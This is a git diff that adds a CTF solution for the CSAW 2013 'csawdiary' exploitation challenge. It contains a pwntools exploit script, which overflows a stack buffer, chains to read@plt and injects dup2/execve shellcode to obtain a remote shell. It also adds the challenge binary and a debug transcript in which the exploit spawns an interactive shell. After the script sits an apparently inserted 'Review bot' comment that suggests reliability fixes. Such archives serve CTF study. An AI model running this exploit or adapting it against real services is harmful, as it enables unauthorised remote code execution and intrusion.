diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/README.md b/2013/csaw-quals-2013/exploitation/csawdiary-300/README.md
new file mode 100644
index 0000000..fe22d8d
--- /dev/null
+++ b/2013/csaw-quals-2013/exploitation/csawdiary-300/README.md
@@ -0,0 +1,3 @@
+# Info
+
+This writeup is based on http://www.blue-lotus.net/csaw-ctf-quals-2013-exp300-writeup/
\ No newline at end of file
diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/exploit.py b/2013/csaw-quals-2013/exploitation/csawdiary-300/exploit.py
new file mode 100644
index 0000000..137637b
--- /dev/null
+++ b/2013/csaw-quals-2013/exploitation/csawdiary-300/exploit.py
@@ -0,0 +1,40 @@
+from pwn import *
+context(os='linux', arch='i386', log_level='DEBUG')
+
+# If a HOST is given on the cmdline, then assume that it is already
+# running there
+if 'HOST' in args:
+ HOST = args['HOST']
+ PORT = int(args.get('PORT', 34266))
+ plt_read = 0x80486e0
+else:
+ # Otherwise start the binary locally
+ HOST = "127.0.0.1"
+ PORT = 34266
+ p = process('./fil_chal')
+ sleep(0.5)
+ binary = ELF("./fil_chal")
+ plt_read = binary.plt['read'] # read@plt: call 80486e0
+
+SHELLCODE = asm(shellcraft.dupsh(4))
+
+with remote(HOST, PORT) as r:
+ r.sendlineafter('UserName: ', 'csaw2013')
+ r.sendlineafter('Password: ', 'S1mplePWD')
+ r.sendlineafter('Entry Info: ', '65535')
+
+ buf = "A" * 0x420 # 1056
+ buf += p32(plt_read)
+ buf += p32(0x8049110) # pop pop pop ret
+ buf += p32(4) # fd
+ buf += p32(0x804b000) # static
+ buf += p32(2)
+ buf += p32(0x804b000) # static
+ buf += asm(shellcraft.i386.nop()) * 100
+ buf += SHELLCODE
+
+ log.info("Sending payload:\n%s" % hexdump(buf))
+ r.send(buf)
+ r.send(asm('jmp esp')) # Jump to Shellcode
+ sleep(0.1)
+ r.interactive()
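Review bot: The second stage `r.send(asm('jmp esp'))` is issued immediately after `r.send(buf)` with no delay, so on a TCP stream the two bytes can be coalesced into the same segment and swallowed by the first, large read (presumably sized by the `65535` Entry Info) instead of the ROP chain's `read(4, 0x804b000, 2)`, which would then block waiting for input; the transcript only shows this winning the race locally. Inserting `sleep(0.1)` between the two sends, as the script already does before `r.interactive()`, makes the staging deterministic in practice. The socket descriptor `4` is also hard-coded in two places (`shellcraft.dupsh(4)` and `p32(4) # fd`) with no note that it presumably assumes the accepted client socket lands on fd 4 in the forked service; a single `SOCK_FD = 4  # accepted client socket in the forked child - TODO confirm against the service` used in both spots would make that assumption explicit and easy to retarget. The hard-coded `plt_read = 0x80486e0` on the HOST path likewise assumes the remote binary matches the local one, which only the local branch's comment `# read@plt: call 80486e0` documents, and only implicitly.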
diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/fil_chal b/2013/csaw-quals-2013/exploitation/csawdiary-300/fil_chal
new file mode 100755
index 0000000..fdc77be
Binary files /dev/null and b/2013/csaw-quals-2013/exploitation/csawdiary-300/fil_chal differ
diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/transcript.txt b/2013/csaw-quals-2013/exploitation/csawdiary-300/transcript.txt
new file mode 100644
index 0000000..49e30b8
--- /dev/null
+++ b/2013/csaw-quals-2013/exploitation/csawdiary-300/transcript.txt
@@ -0,0 +1,135 @@ +user@ubuntuvm:~/Desktop/csaw_diary$ python exploit.py +[+] Starting program './fil_chal': Done +[*] Security settings for 'fil_chal': + RELRO: Full RELRO + Stack Canary: No canary found + NX: NX disabled + PIE: No PIE + RPATH: No RPATH + RUNPATH: No RUNPATH +[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin +[DEBUG] Assembling + .org 0x0 + .section .shellcode,"ax" + .intel_syntax noprefix + dup_1: + push 0x4 + pop ebx + push 0x3 + pop ecx + loop_2: + dec ecx + /* call dup2('ebx', 'ecx') */ + /* moving ebx into ebx, but this is a no-op */ + /* moving ecx into ecx, but this is a no-op */ + push 0x3f + pop eax + int 0x80 + jnz loop_2 + /* push '/bin///sh\x00' */ + push 0x68 + push 0x732f2f2f + push 0x6e69622f + /* call execve('esp', 0, 0) */ + mov ebx, esp + xor ecx, ecx + push 0xb + pop eax + cdq /* Set edx to 0, eax is known to be positive */ + int 0x80 +[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-H5qiOE/step2 /tmp/pwn-asm-H5qiOE/step1 +[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-H5qiOE/step2 /tmp/pwn-asm-H5qiOE/step3 +[+] Opening connection to 127.0.0.1 on port 34266: Done +[DEBUG] Received 0x2b5 bytes: + ' ************* $$$$$$$$$ AAAAAAA ***** *****\n' + ' * ******* * $ $$ $$ A A * * * * \n' + ' * * *** $ $ $$ A A A A * * * * \n' + ' * * $ $ A A___A A * * * * \n' + ' * * $ $ A A * * **** * *\n' + ' * * $ $ A AAA A * * * * * *\n' + ' * * *** $ $ A A A A * *** *** *\n' + ' * ******** * $$$$$$ $ A A A A * * \n' + ' ************* $$$$$$$$$$ AAAAAA AAAAAA ************* \n' + '\t\tDairy\n' + '\n' + 'UserName: ' +[DEBUG] Sent 0x9 bytes: + 'csaw2013\n' +[DEBUG] Received 0xa bytes: + 'Password: ' +[DEBUG] Sent 0xa bytes: + 'S1mplePWD\n' +[DEBUG] Received 0x26 bytes: + 'Welcome!\n' + 'http://youtu.be/KmtzQCSh6xk\n' + '\n' +[DEBUG] Received 0xc bytes: + 'Entry Info: ' +[DEBUG] Sent 0x6 bytes: + '65535\n' +[DEBUG] cpp -C -nostdinc -undef -P 
-I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin +[DEBUG] Assembling + .org 0x0 + .section .shellcode,"ax" + .intel_syntax noprefix + nop +[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-pBUQZ0/step2 /tmp/pwn-asm-pBUQZ0/step1 +[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-pBUQZ0/step2 /tmp/pwn-asm-pBUQZ0/step3 +[*] Sending payload: + 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│ + * + 00000420 e0 86 04 08 10 91 04 08 04 00 00 00 00 b0 04 08 │····│····│····│····│ + 00000430 02 00 00 00 00 b0 04 08 90 90 90 90 90 90 90 90 │····│····│····│····│ + 00000440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 │····│····│····│····│ + * + 00000490 90 90 90 90 90 90 90 90 90 90 90 90 6a 04 5b 6a │····│····│····│j·[j│ + 000004a0 03 59 49 6a 3f 58 cd 80 75 f8 6a 68 68 2f 2f 2f │·YIj│?X··│u·jh│h///│ + 000004b0 73 68 2f 62 69 6e 89 e3 31 c9 6a 0b 58 99 cd 80 │sh/b│in··│1·j·│X···│ + 000004c0 +[DEBUG] Sent 0x4c0 bytes: + 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│ + * + 00000420 e0 86 04 08 10 91 04 08 04 00 00 00 00 b0 04 08 │····│····│····│····│ + 00000430 02 00 00 00 00 b0 04 08 90 90 90 90 90 90 90 90 │····│····│····│····│ + 00000440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 │····│····│····│····│ + * + 00000490 90 90 90 90 90 90 90 90 90 90 90 90 6a 04 5b 6a │····│····│····│j·[j│ + 000004a0 03 59 49 6a 3f 58 cd 80 75 f8 6a 68 68 2f 2f 2f │·YIj│?X··│u·jh│h///│ + 000004b0 73 68 2f 62 69 6e 89 e3 31 c9 6a 0b 58 99 cd 80 │sh/b│in··│1·j·│X···│ + 000004c0 +[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin +[DEBUG] Assembling + .org 0x0 + .section .shellcode,"ax" + .intel_syntax noprefix + jmp esp +[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-5LAGnQ/step2 /tmp/pwn-asm-5LAGnQ/step1 +[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-5LAGnQ/step2 /tmp/pwn-asm-5LAGnQ/step3 +[DEBUG] Sent 
0x2 bytes: + 00000000 ff e4 │··│ + 00000002 +[*] Switching to interactive mode +$ ls -l +[DEBUG] Sent 0x6 bytes: + 'ls -l\n' +[DEBUG] Received 0x6f bytes: + 'total 16\n' + '-rw-rw-r-- 1 user user 1125 Mar 14 16:35 exploit.py\n' + '-rwxr-x--x 1 user user 9552 Mar 14 04:36 fil_chal\n' +total 16 +-rw-rw-r-- 1 user user 1125 Mar 14 16:35 exploit.py +-rwxr-x--x 1 user user 9552 Mar 14 04:36 fil_chal +$ whoami +[DEBUG] Sent 0x7 bytes: + 'whoami\n' +[DEBUG] Received 0x5 bytes: + 'user\n' +user +$ exit +[DEBUG] Sent 0x5 bytes: + 'exit\n' +[*] Got EOF while reading in interactive +$ +[*] Interrupted +[*] Closed connection to 127.0.0.1 port 34266 +[*] Program './fil_chal' stopped with exit code 255